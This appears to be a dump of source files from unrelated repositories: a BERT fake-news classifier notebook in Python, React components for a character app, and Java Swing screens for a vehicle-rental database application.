It's a mask to be used if the input sequence length is smaller than the max input sequence length in the current batch. It's the mask that we typically use for attention when a batch has varying length sentences. `labels`: labels for the classification output: torch.LongTensor of shape [batch_size] with indices selected in [0, ..., num_labels]. Outputs: if `labels` is not `None`: Outputs the CrossEntropy classification loss of the output with the labels. if `labels` is `None`: Outputs the classification logits of shape [batch_size, num_labels]. Example usage: ```python # Already been converted into WordPiece token ids input_ids = torch.LongTensor([[31, 51, 99], [15, 5, 0]]) input_mask = torch.LongTensor([[1, 1, 1], [1, 1, 0]]) token_type_ids = torch.LongTensor([[0, 0, 1], [0, 1, 0]]) config = BertConfig(vocab_size_or_config_json_file=32000, hidden_size=768, num_hidden_layers=12, num_attention_heads=12, intermediate_size=3072) num_labels = 2 model = BertForSequenceClassification(config, num_labels) logits = model(input_ids, token_type_ids, input_mask) ``` """ def __init__(self, num_labels=2): super(BertForSequenceClassification, self).__init__() self.num_labels = num_labels if par_cased ==1: self.bert = BertModel.from_pretrained('bert-base-cased') else: self.bert = BertModel.from_pretrained('bert-base-uncased') self.dropout = nn.Dropout(config.hidden_dropout_prob) self.classifier = nn.Linear(config.hidden_size, num_labels) nn.init.xavier_normal_(self.classifier.weight) def forward(self, input_ids, token_type_ids=None, attention_mask=None, labels=None): _, pooled_output = self.bert(input_ids, token_type_ids, attention_mask, output_all_encoded_layers=False) pooled_output = self.dropout(pooled_output) logits = self.classifier(pooled_output) return logits def freeze_bert_encoder(self): for param in self.bert.parameters(): param.requires_grad = False def unfreeze_bert_encoder(self): for param in self.bert.parameters(): param.requires_grad = True from 
pytorch_pretrained_bert import BertConfig config = BertConfig(vocab_size_or_config_json_file=32000, hidden_size=768, num_hidden_layers=12, num_attention_heads=12, intermediate_size=3072) num_labels = 2 model = BertForSequenceClassification(num_labels) # Convert inputs to PyTorch tensors #tokens_tensor = torch.tensor([tokenizer.convert_tokens_to_ids(zz)]) #logits = model(tokens_tensor) ``` ## 2. Dataset Processing ### 2.1 Read the data and convert label into binary text ```Python import pandas as pd dat = pd.read_csv('/data/fake_or_real_news.csv') dat.head() dat = dat.drop(columns=['Unnamed: 0', 'title_vectors']) for i in range(len(dat)): if dat.loc[i, 'label'] == "REAL": #REAL equal 0 dat.loc[i, 'label'] = 0 elif dat.loc[i, 'label'] == "FAKE": #FAKE equal 1 dat.loc[i, 'label'] = 1 if dat.loc[i, 'text'] == "": dat = dat.drop([i]) dat.head() ``` ### 2.2 Combine the title and text ```Python dat_plus = dat.copy() dat_plus['title_text']=dat['title']+'. '+dat['text'] dat_plus = dat_plus.drop(columns=['title', 'text']) dat_plus['title_text'] ``` ### 2.3 Use regular expression to drop non-sentence ```Python import re def cleanup(text): if par_cased == 0: # transfer into lower text if par_cased is false text = text.lower() text = re.sub(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+','',text) # drop http[s]://* text = re.sub(u"\\{.*?}|\\[.*?]",'',text) # drop [*] text = re.sub(u"\(\@.*?\s", '', text) # drop something like (@EP_President) text = re.sub(u"\@.*?\s", '', text) # drop soething liek @EP_President text = re.sub(u"\#.*?\s", '', text) # drop something like #EP_President (maybe hashtag) text = re.sub(u"\© .*?\s", '', text) # drop something like © EP_President text = re.sub(r'pic.tw(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+','',text) # drop pic.twitter.com/* text = re.sub(u"\*\*", '', text) # drop something like **Want FOX News First * in your inbox every day? 
Sign up here.** text = re.sub(u"|•|☮️|💚|🌍|😍|♦|☢", '', text) # drop something like  and • etc return(text) ``` ### 2.4 Use EDA method to augment the text ```Python import nlpaug.augmenter.char as nac import nlpaug.augmenter.word as naw import nlpaug.flow as nafc from nlpaug.util import Action import nltk nltk.download('punkt') if par_cased ==1: aug = naf.Sequential([ naw.BertAug(action="substitute", aug_p=0.8, aug_n=20,model_path='bert-base-cased',tokenizer_path='bert-base-cased'), naw.BertAug(action="insert", aug_p=0.1) ]) else: aug = naf.Sequential([ naw.BertAug(action="substitute", aug_p=0.8, aug_n=20,model_path='bert-base-uncased',tokenizer_path='bert-base-uncased'), naw.BertAug(action="insert", aug_p=0.1) ]) def aug_text(text): text = aug.augment(text) return(text) from nltk.tokenize import sent_tokenize def sentence_token_nltk(text): sent_tokenize_list = sent_tokenize(text) return sent_tokenize_list def eda_text(text): if len(text) < 2: return(text) # split text into sentences text = sentence_token_nltk(text) if len(text) <= 1: return(text) if len(text) == 2: for i in range(len(text)): if i == 0: tmp_text = text[i] else: tmp_text += text[i] return(tmp_text) # operate prior 3 sentences for i in range(3): if i == 0: tmp_text = text[i] else: tmp_text += text[i] zz = tokenizer.tokenize(tmp_text) # operate proper sentences if len(zz) <= 500: #print(len(zz)) tmp_text = aug_text(tmp_text) # conbine prior 3 sentences and rest sentences for j in range(len(text)-3): tmp_text += text[j+3] return(tmp_text) if par_eda == 1: # use eda to operate sentences when par_eda is true for i in range(len(dat_plus['title_text'])): if i%6 == 1: #print(i) dat_plus['title_text'][i] = copy.deepcopy(eda_text(dat_plus['title_text'][i])) dat_plus['title_text'][i] = "".join(dat_plus['title_text'][i]) ``` ## 3. 
Google Bert ```Python import torch.nn.functional as F #F.softmax(logits,dim=1) from sklearn.model_selection import train_test_split if par_cleanup == 1: X = dat_plus['title_text'].apply(cleanup) else: X = dat_plus['title_text'] y = dat_plus['label'] X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=42) X_train = X_train.values.tolist() X_test = X_test.values.tolist() y_train = pd.get_dummies(y_train).values.tolist() # convert to one-hot encoding y_test = pd.get_dummies(y_test).values.tolist() max_seq_length = 256 class text_dataset(Dataset): def __init__(self,x_y_list, transform=None): self.x_y_list = x_y_list self.transform = transform def __getitem__(self,index): tokenized_title_text = tokenizer.tokenize(self.x_y_list[0][index]) if len(tokenized_title_text) > max_seq_length: tokenized_title_text = tokenized_title_text[:max_seq_length] ids_title_text = tokenizer.convert_tokens_to_ids(tokenized_title_text) #tokens->input_ids padding = [0] * (max_seq_length - len(ids_title_text)) ids_title_text += padding # use padding to make the same ids assert len(ids_title_text) == max_seq_length #print(ids_title_text) ids_title_text = torch.tensor(ids_title_text) label = self.x_y_list[1][index] # color list_of_labels = [torch.from_numpy(np.array(label))] return ids_title_text, list_of_labels[0] def __len__(self): return len(self.x_y_list[0]) ``` ### 3.1 Create data dictionary ```Python batch_size = 16 # divide into 16 batches train_lists = [X_train, y_train] test_lists = [X_test, y_test] training_dataset = text_dataset(x_y_list = train_lists ) test_dataset = text_dataset(x_y_list = test_lists ) dataloaders_dict = {'train': torch.utils.data.DataLoader(training_dataset, batch_size=batch_size, shuffle=True, num_workers=0), 'val':torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=True, num_workers=0) } dataset_sizes = {'train':len(train_lists[0]), 'val':len(test_lists[0])} device = torch.device("cuda:0" if 
torch.cuda.is_available() else "cpu") print(device) ``` ### 3.2 Define the train model ```Python def train_model(model, criterion, optimizer, scheduler, num_epochs=25): since = time.time() print('starting') best_model_wts = copy.deepcopy(model.state_dict()) best_loss = 100 best_f1 = 0.978 best_acc_test = 0.96 best_acc_train = 0.96 best_auc = 0.96 for epoch in range(num_epochs): print('Epoch {}/{}'.format(epoch, num_epochs - 1)) print('-' * 10) # Each epoch has a training and validation phase for phase in ['train', 'val']: if phase == 'train': scheduler.step() model.train() # Set model to training mode else: model.eval() # Set model to evaluate mode running_loss = 0.0 label_corrects = 0 TP = 0 TN = 0 FN = 0 FP = 0 total_scores = [] total_tar = [] # Iterate over data. for inputs, label in dataloaders_dict[phase]: #inputs = inputs #print(len(inputs),type(inputs),inputs) #inputs = torch.from_numpy(np.array(inputs)).to(device) inputs = inputs.to(device) label = label.to(device) # zero the parameter gradients optimizer.zero_grad() # forward # track history if only in train with torch.set_grad_enabled(phase == 'train'): # acquire output outputs = model(inputs) outputs = F.softmax(outputs,dim=1) loss = criterion(outputs, torch.max(label.float(), 1)[1]) # backward + optimize only if in training phase if phase == 'train': loss.backward() optimizer.step() # statistics running_loss += loss.item() * inputs.size(0) label_corrects += torch.sum(torch.max(outputs, 1)[1] == torch.max(label, 1)[1]) #返回每一行中最大值的那个元素,且返回其索引(返回最大元素在这一行的列索引) pred_choice = torch.max(outputs, 1)[1] target = torch.max(label, 1)[1] scores = pred_choice.cpu().tolist() tar = target.cpu().tolist() total_scores = total_scores + scores total_tar = total_tar + tar tmp_tp = 0 tmp_tn = 0 tmp_fn = 0 tmp_fp = 0 if pred_choice.numel()!= target.numel(): print("error") for i in range(pred_choice.numel()): if pred_choice[i] == 1 and target[i] == 1 : tmp_tp = tmp_tp + 1 elif pred_choice[i] == 0 and target[i] == 0 : tmp_tn = 
tmp_tn + 1 elif pred_choice[i] == 0 and target[i] == 1 : tmp_fn = tmp_fn + 1 elif pred_choice[i] == 1 and target[i] == 0 : tmp_fp = tmp_fp + 1 # TP both predict and label are 1 TP += tmp_tp # TN both predict and label are 0 TN += tmp_tn # FN predict 0 label 1 FN += tmp_fn # FP predict 1 label 0 FP += tmp_fp epoch_loss = running_loss / dataset_sizes[phase] p = TP / (TP + FP) r = TP / (TP + FN) F1 = 2 * r * p / (r + p) acc = (TP + TN) / (TP + TN + FP + FN) ### draw ROC curce tpr = TP/(TP+FN) fpr = FP/(FP+TN) tnr = TN/(FP+TN) total_scores = np.array(total_scores) total_tar = np.array(total_tar) fpr, tpr, thresholds = roc_curve(total_tar, total_scores) roc_auc = auc(fpr, tpr) plt.title('ROC') if roc_auc > best_auc: best_auc = roc_auc if epoch < num_epochs -1: plt.plot(fpr, tpr,'b',label='AUC = %0.4f'% roc_auc) if epoch == num_epochs -1: plt.plot(fpr, tpr, color='darkorange', label='MAX AUC = %0.4f'% best_auc) plt.legend(loc='lower right') plt.plot([0,1],[0,1],'r--') plt.ylabel('TPR') plt.xlabel('FPR') plt.show() #print('{} p: {:.4f} '.format(phase,p )) #print('{} r: {:.4f} '.format(phase,r )) print('{} F1: {:.4f} '.format(phase,F1 )) print('{} accuracy: {:.4f} '.format(phase,acc )) if phase == 'val' and epoch_loss < best_loss: print('saving with loss of {}'.format(epoch_loss), 'improved over previous {}'.format(best_loss)) best_loss = epoch_loss best_model_wts = copy.deepcopy(model.state_dict()) #torch.save(model.state_dict(), '/content/drive/My Drive/Colab Notebooks/bert_model_test_loss.pth') if F1 > best_f1: best_f1 = F1 if phase == 'val' and acc > best_acc_test: best_acc_test = acc if phase == 'train' and acc > best_acc_train: best_acc_train = acc #best_model_wts = copy.deepcopy(model.state_dict()) #torch.save(model.state_dict(), '/content/drive/My Drive/Colab Notebooks/bert_model_test_f1.pth') print() time_elapsed = time.time() - since print('Training complete in {:.0f}m {:.0f}s'.format( time_elapsed // 60, time_elapsed % 60)) print("Parament setting: ") 
print("cased: ",par_cased) print("cleanup: ",par_cleanup) print("eda: ",par_eda) print('Best train Acc: {:4f}'.format(float(best_acc_train))) print('Best test Acc: {:4f}'.format(float(best_acc_test))) print('Best f1 score: {:4f}'.format(float(best_f1))) # load best model weights model.load_state_dict(best_model_wts) return model ``` ## 4. Final output ### 4.1 Model details ```Python print(model) model.to(device) ``` ### 4.2 F1 and other details ```Python model_ft1 = train_model(model, criterion, optimizer_ft, exp_lr_scheduler,num_epochs=10) ```
7c0ef61945299344f4f27f65565ef213e7fa83ce
[ "Markdown", "Python" ]
2
Python
NavePnow/Google-BERT-on-fake_or_real-news-dataset
0968fc170253e9bb1f3db4d6266aaca5e829c988
bc692d2f63d14ac263fff2b4b29463d1273271d6
refs/heads/master
<file_sep>import React from 'react'; import styled from 'styled-components'; import Text from './Text'; const Button = styled.div` padding: 5px; border: 1px solid white; border-radius: 4px; font-weight: 200; font-family: OpenSans; cursor: pointer; color: white; &:hover { background-color: white; color: ${props => props.theme.almostblack}; } ` export default Button;<file_sep>import React, { Component } from 'react'; import styled from 'styled-components'; import { connect } from 'react-redux'; import { withRouter } from 'react-router-dom'; import { loadAll, createCharacter } from '../reducers/characters'; import { startCharacterCreation, changeCharacterCreationStage } from '../reducers/ui'; import Container from '../atoms/Container'; import CharacterCreation from '../components/CharacterCreation'; import Character from '../components/Character'; const AddCharacter = styled.div` position: absolute; bottom: 15px; right: 15px; background-color: ${props => props.theme.green}; border-radius: 3px; outline: none; border: none; color: ${props => props.theme.text}; padding: 15px 32px; text-align: center; text-decoration: none; font-size: 16px; box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19); &:active { box-shadow: none; } ` class Characters extends Component { componentWillMount() { if (!this.props.loaded) this.props.loadAll() } render() { const { characters, createCharacter, creatingCharacter, creationStage, startCharacterCreation, changeCharacterCreationStage } = this.props; console.log(creatingCharacter) if (creatingCharacter) { return ( <CharacterCreation stage={creationStage} changeStage={changeCharacterCreationStage} /> ) } return ( <Container width='100%' height='100%'> { (characters.length === 0) ? 
null : characters.map(character => { const { name, job, lvl } = character return <Character key={character._id} name={name} job={job} lvl={lvl} character={character} id={character._id} /> }) } <AddCharacter onClick={createCharacter}>Add Character</AddCharacter> </Container> ) } } const mapStateToProps = (state) => { return { characters: state.characters.characters, loaded: state.characters.loaded, creatingCharacter: state.ui.creatingCharacter, creationStage: state.ui.creationStage } } export default withRouter(connect(mapStateToProps, { loadAll, createCharacter, startCharacterCreation, changeCharacterCreationStage })(Characters));<file_sep>import React from 'react'; import styled from 'styled-components'; import LI from '../atoms/ListItem'; import Container from '../atoms/Container'; import Text from '../atoms/Text'; const ListItem = styled(LI)` cursor: pointer; border-radius: 4px; &:hover { background-color: ${props => props.theme.dark}; } ` const Description = styled(Text)` overflow: hidden; text-overflow: ellipsis; ` const Item = ({ item }) => { return ( <ListItem key={item.id} direction='row' padding='5px' width='calc(100% - 10px)' justifyContent='space-between' alignItems='center' hover> <Container maxWidth='50%' flowY='hidden' flowWrap> <Text>{item.name}</Text> <Description size='0.8em'>{item.type}</Description> </Container> <Container direction='row'> <Text margin='0 6px'>55 lb</Text> <Text margin='0 6px'>75 gp</Text> </Container> </ListItem> ) } export default Item;
66a07d8afb3063c2e8e2ca2f7ba1b2ad1e652405
[ "JavaScript" ]
3
JavaScript
lorddusk/BardsBallad
1cd831770c27f48397b3518fbc69f552e7c46d7e
891d497df24b4def0cfc995f61ca51df42074613
refs/heads/master
<repo_name>LuisEduardoER/locadoradeveiculospucc<file_sep>/src/net/danielpaz/pucc/poo/trabalho/view/ExibirModelo.java package net.danielpaz.pucc.poo.trabalho.view; import java.sql.ResultSet; import java.sql.ResultSetMetaData; import java.sql.SQLException; import java.util.Vector; import java.util.logging.Level; import java.util.logging.Logger; import javax.swing.JOptionPane; import javax.swing.table.DefaultTableModel; import javax.swing.table.TableModel; import net.danielpaz.pucc.poo.trabalho.conexao.*; import net.danielpaz.pucc.poo.trabalho.model.*; import javax.swing.GroupLayout.Alignment; import javax.swing.GroupLayout; import javax.swing.LayoutStyle.ComponentPlacement; public class ExibirModelo extends javax.swing.JPanel { public ExibirModelo() { initComponents(); } private void initComponents() { jPanel2 = new javax.swing.JPanel(); jLabel1 = new javax.swing.JLabel(); jScrollPane1 = new javax.swing.JScrollPane(); tableModelo = new javax.swing.JTable(); bBuscarTodos = new javax.swing.JButton(); bDeletar = new javax.swing.JButton(); setBackground(new java.awt.Color(255, 255, 255)); jPanel2.setBackground(new java.awt.Color(255, 255, 255)); jLabel1.setFont(new java.awt.Font("Arial", 1, 18)); // NOI18N jLabel1.setText("Exibir Modelo"); tableModelo.setModel(new javax.swing.table.DefaultTableModel( new Object [][] { {null, null, null} }, new String [] { "Codigo", "Marca", "Descrição" } )); jScrollPane1.setViewportView(tableModelo); bBuscarTodos.setBackground(new java.awt.Color(255, 255, 255)); bBuscarTodos.setText("BUCAR TODOS"); bBuscarTodos.addActionListener(new java.awt.event.ActionListener() { public void actionPerformed(java.awt.event.ActionEvent evt) { bBuscarTodosActionPerformed(evt); } }); bDeletar.setBackground(new java.awt.Color(255, 255, 255)); bDeletar.setText("DELETAR"); bDeletar.addActionListener(new java.awt.event.ActionListener() { public void actionPerformed(java.awt.event.ActionEvent evt) { bDeletarActionPerformed(evt); } }); javax.swing.GroupLayout 
jPanel2Layout = new javax.swing.GroupLayout(jPanel2); jPanel2Layout.setHorizontalGroup( jPanel2Layout.createParallelGroup(Alignment.LEADING) .addGroup(jPanel2Layout.createSequentialGroup() .addGap(75) .addGroup(jPanel2Layout.createParallelGroup(Alignment.LEADING) .addComponent(jLabel1) .addComponent(jScrollPane1, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE) .addGroup(jPanel2Layout.createSequentialGroup() .addGap(48) .addComponent(bBuscarTodos) .addGap(153) .addComponent(bDeletar))) .addContainerGap(94, Short.MAX_VALUE)) ); jPanel2Layout.setVerticalGroup( jPanel2Layout.createParallelGroup(Alignment.LEADING) .addGroup(jPanel2Layout.createSequentialGroup() .addGap(24) .addComponent(jLabel1) .addGap(96) .addGroup(jPanel2Layout.createParallelGroup(Alignment.BASELINE) .addComponent(bDeletar) .addComponent(bBuscarTodos)) .addGap(46) .addComponent(jScrollPane1, GroupLayout.PREFERRED_SIZE, 287, GroupLayout.PREFERRED_SIZE) .addGap(0, 140, Short.MAX_VALUE)) ); jPanel2.setLayout(jPanel2Layout); javax.swing.GroupLayout layout = new javax.swing.GroupLayout(this); this.setLayout(layout); layout.setHorizontalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, layout.createSequentialGroup() .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) .addComponent(jPanel2, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addGap(20, 20, 20)) ); layout.setVerticalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(layout.createSequentialGroup() .addGap(91, 91, 91) .addComponent(jPanel2, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addContainerGap()) ); } private void bBuscarTodosActionPerformed(java.awt.event.ActionEvent evt) { try { BD bd = new BD 
("oracle.jdbc.driver.OracleDriver","jdbc:oracle:thin:@localhost:1521:xe","system", "poo2014"); ModeloDAO modeloDAO = new ModeloDAO (bd); ResultSet resultado = modeloDAO.getModelo(); TableModel tblModel = buildTableModel(resultado); tableModelo.setModel(tblModel); } catch (Exception e) { Logger.getLogger(ExibirModelo.class.getName()).log(Level.SEVERE, null, e); } } private void bDeletarActionPerformed(java.awt.event.ActionEvent evt) { if(tableModelo.getSelectedRowCount() > 0){ try { BD bd = new BD ("oracle.jdbc.driver.OracleDriver","jdbc:oracle:thin:@localhost:1521:xe","system", "poo2014"); ModeloDAO modeloDAO = new ModeloDAO (bd); for (int i : tableModelo.getSelectedRows()) { Object modeloDeletar = tableModelo.getValueAt(i, 0); String modeloDesc = (String) tableModelo.getValueAt(i, 1); int resposta; resposta = JOptionPane.showConfirmDialog(null, "Deseja deletar o Modelo " +modeloDesc + "?"); if (resposta == JOptionPane.YES_OPTION) { modeloDAO.excluir(modeloDeletar); } else { return; } } bd.fecharConexao(); if (bd.sucessoBanco(true)) { JOptionPane.showMessageDialog(null, "Registros deletados com sucesso !", TOOL_TIP_TEXT_KEY, WIDTH, null); return; } else { JOptionPane.showMessageDialog(null, "Erro de conexão ao banco", TOOL_TIP_TEXT_KEY, WIDTH, null); return; } } catch (Exception e) { Logger.getLogger(ExibirModelo.class.getName()).log(Level.SEVERE, null, e); } } } public static DefaultTableModel buildTableModel(ResultSet rs) throws SQLException { ResultSetMetaData metaData = rs.getMetaData(); // names of columns Vector<String> columnNames = new Vector<String>(); int columnCount = metaData.getColumnCount(); for (int column = 1; column <= columnCount; column++) { columnNames.add(metaData.getColumnName(column)); } // data of the table Vector<Vector<Object>> data = new Vector<Vector<Object>>(); while (rs.next()) { Vector<Object> vector = new Vector<Object>(); for (int columnIndex = 1; columnIndex <= columnCount; columnIndex++) { vector.add(rs.getObject(columnIndex)); } 
data.add(vector); } return new DefaultTableModel(data, columnNames); } private javax.swing.JButton bBuscarTodos; private javax.swing.JButton bDeletar; private javax.swing.JLabel jLabel1; private javax.swing.JPanel jPanel2; private javax.swing.JScrollPane jScrollPane1; private javax.swing.JTable tableModelo; } <file_sep>/src/net/danielpaz/pucc/poo/trabalho/control/Modelo.java package net.danielpaz.pucc.poo.trabalho.control; public class Modelo extends Marca { protected int idModelo; protected String descricaoModelo; public void setIdModelo (int idModelo) throws Exception { if (idModelo <= 0) throw new Exception ("Codigo invalido"); this.idModelo = idModelo; } public void setDescricaoModelo (String descricaoModelo) throws Exception { if (descricaoModelo==null || descricaoModelo.equals("")) throw new Exception ("Descricao nao fornecida"); this.descricaoModelo = descricaoModelo; } public int getIdModelo () { return this.idModelo; } public String getDescricaoModelo () { return this.descricaoModelo; } public Modelo (int idMarca, int idModelo, String descricaoModelo) throws Exception { super(idMarca); this.setIdModelo(idModelo); this.setDescricaoModelo (descricaoModelo); } public Modelo (int idMarca,String descricaoModelo) throws Exception { super(idMarca); this.setDescricaoModelo (descricaoModelo); } } <file_sep>/src/net/danielpaz/pucc/poo/trabalho/view/ExibirTipoVeiculo.java package net.danielpaz.pucc.poo.trabalho.view; import java.sql.ResultSet; import java.sql.ResultSetMetaData; import java.sql.SQLException; import java.util.Vector; import java.util.logging.Level; import java.util.logging.Logger; import javax.swing.JOptionPane; import javax.swing.table.DefaultTableModel; import javax.swing.table.TableModel; import net.danielpaz.pucc.poo.trabalho.conexao.*; import net.danielpaz.pucc.poo.trabalho.control.TipoVeiculo; import net.danielpaz.pucc.poo.trabalho.model.*; public class ExibirTipoVeiculo extends javax.swing.JPanel { public ExibirTipoVeiculo() { initComponents(); 
} private void initComponents() { jPanel2 = new javax.swing.JPanel(); jLabel1 = new javax.swing.JLabel(); jLabel4 = new javax.swing.JLabel(); tdCodigo = new javax.swing.JTextField(); bBuscar = new javax.swing.JButton(); jScrollPane1 = new javax.swing.JScrollPane(); tableModelo = new javax.swing.JTable(); bBuscarTodos = new javax.swing.JButton(); bDeletar = new javax.swing.JButton(); setBackground(new java.awt.Color(255, 255, 255)); jPanel2.setBackground(new java.awt.Color(255, 255, 255)); jLabel1.setFont(new java.awt.Font("Arial", 1, 18)); // NOI18N jLabel1.setText("Exibir Tipo de Veículo"); jLabel4.setFont(new java.awt.Font("Arial", 0, 12)); // NOI18N jLabel4.setText("Código"); tdCodigo.addActionListener(new java.awt.event.ActionListener() { public void actionPerformed(java.awt.event.ActionEvent evt) { tdCodigoActionPerformed(evt); } }); bBuscar.setBackground(new java.awt.Color(255, 255, 255)); bBuscar.setText("BUSCAR"); bBuscar.setFocusable(false); bBuscar.setHorizontalTextPosition(javax.swing.SwingConstants.CENTER); bBuscar.setVerticalTextPosition(javax.swing.SwingConstants.BOTTOM); bBuscar.addActionListener(new java.awt.event.ActionListener() { public void actionPerformed(java.awt.event.ActionEvent evt) { bBuscarActionPerformed(evt); } }); tableModelo.setModel(new javax.swing.table.DefaultTableModel( new Object [][] { {null, null, null} }, new String [] { "Codigo", "Preço (R$)", "Descrição" } )); jScrollPane1.setViewportView(tableModelo); bBuscarTodos.setBackground(new java.awt.Color(255, 255, 255)); bBuscarTodos.setText("BUCAR TODOS"); bBuscarTodos.addActionListener(new java.awt.event.ActionListener() { public void actionPerformed(java.awt.event.ActionEvent evt) { bBuscarTodosActionPerformed(evt); } }); bDeletar.setBackground(new java.awt.Color(255, 255, 255)); bDeletar.setText("DELETAR"); bDeletar.addActionListener(new java.awt.event.ActionListener() { public void actionPerformed(java.awt.event.ActionEvent evt) { bDeletarActionPerformed(evt); } }); 
javax.swing.GroupLayout jPanel2Layout = new javax.swing.GroupLayout(jPanel2); jPanel2.setLayout(jPanel2Layout); jPanel2Layout.setHorizontalGroup( jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel2Layout.createSequentialGroup() .addGap(75, 75, 75) .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel2Layout.createSequentialGroup() .addComponent(jLabel1) .addContainerGap(426, Short.MAX_VALUE)) .addGroup(jPanel2Layout.createSequentialGroup() .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addComponent(jLabel4) .addComponent(jScrollPane1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addGroup(jPanel2Layout.createSequentialGroup() .addComponent(bBuscar) .addGap(38, 38, 38) .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel2Layout.createSequentialGroup() .addComponent(bBuscarTodos) .addGap(42, 42, 42) .addComponent(bDeletar)) .addComponent(tdCodigo, javax.swing.GroupLayout.PREFERRED_SIZE, 103, javax.swing.GroupLayout.PREFERRED_SIZE)))) .addGap(0, 0, Short.MAX_VALUE)))) ); jPanel2Layout.setVerticalGroup( jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel2Layout.createSequentialGroup() .addGap(24, 24, 24) .addComponent(jLabel1) .addGap(42, 42, 42) .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) .addComponent(jLabel4) .addComponent(tdCodigo, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)) .addGap(34, 34, 34) .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addComponent(bBuscar) .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) .addComponent(bBuscarTodos) .addComponent(bDeletar))) .addGap(46, 
46, 46) .addComponent(jScrollPane1, javax.swing.GroupLayout.PREFERRED_SIZE, 287, javax.swing.GroupLayout.PREFERRED_SIZE) .addGap(0, 140, Short.MAX_VALUE)) ); javax.swing.GroupLayout layout = new javax.swing.GroupLayout(this); this.setLayout(layout); layout.setHorizontalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, layout.createSequentialGroup() .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) .addComponent(jPanel2, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addGap(20, 20, 20)) ); layout.setVerticalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(layout.createSequentialGroup() .addGap(91, 91, 91) .addComponent(jPanel2, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addContainerGap()) ); } private void bBuscarActionPerformed(java.awt.event.ActionEvent evt) { if(tdCodigo.getText().isEmpty()){ JOptionPane.showMessageDialog(null, "Por favor informe o código !", TOOL_TIP_TEXT_KEY, WIDTH, null); return; } try { BD bd = new BD ("oracle.jdbc.driver.OracleDriver","jdbc:oracle:thin:@localhost:1521:xe","system", "poo2014"); TipoVeiculo tipoVeiculo = new TipoVeiculo (Integer.parseInt(tdCodigo.getText())); int auxTipoVeiculo = tipoVeiculo.getCodigo(); TipoVeiculoDAO tipoVeiculoDAO = new TipoVeiculoDAO (bd); TipoVeiculo tv = tipoVeiculoDAO.getTipoVeiculo(auxTipoVeiculo); tableModelo.getModel().setValueAt(tv.getCodigo(), 0, 0); tableModelo.getModel().setValueAt(tv.getPreco(), 0, 1); tableModelo.getModel().setValueAt(tv.getDescricao(), 0, 2); repaint(); } catch (Exception ex) { Logger.getLogger(ExibirTipoVeiculo.class.getName()).log(Level.SEVERE, null, ex); } } private void tdCodigoActionPerformed(java.awt.event.ActionEvent evt) { } private void 
bBuscarTodosActionPerformed(java.awt.event.ActionEvent evt) { try { BD bd = new BD ("oracle.jdbc.driver.OracleDriver","jdbc:oracle:thin:@localhost:1521:xe","system", "poo2014"); TipoVeiculoDAO tipoVeiculoDAO = new TipoVeiculoDAO (bd); ResultSet resultado = tipoVeiculoDAO.getTipoVeiculo(); TableModel tblModel = buildTableModel(resultado); tableModelo.setModel(tblModel); } catch (Exception e) { Logger.getLogger(ExibirTipoVeiculo.class.getName()).log(Level.SEVERE, null, e); } } private void bDeletarActionPerformed(java.awt.event.ActionEvent evt) { if(tableModelo.getSelectedRowCount() > 0){ try { BD bd = new BD ("oracle.jdbc.driver.OracleDriver","jdbc:oracle:thin:@localhost:1521:xe","system", "poo2014"); TipoVeiculoDAO tipoVeiculoDAO = new TipoVeiculoDAO (bd); for (int i : tableModelo.getSelectedRows()) { Object tpVeiculoDeletar = tableModelo.getValueAt(i, 0); String tpVeiculoDesc = (String) tableModelo.getValueAt(i, 2); int resposta; resposta = JOptionPane.showConfirmDialog(null, "Deseja deletar o Tipo de Veiculo " +tpVeiculoDesc + "?"); if (resposta == JOptionPane.YES_OPTION) { tipoVeiculoDAO.excluir(tpVeiculoDeletar); } else { return; } } bd.fecharConexao(); if (bd.sucessoBanco(true)) { JOptionPane.showMessageDialog(null, "Registros deletados com sucesso !", TOOL_TIP_TEXT_KEY, WIDTH, null); return; } else { 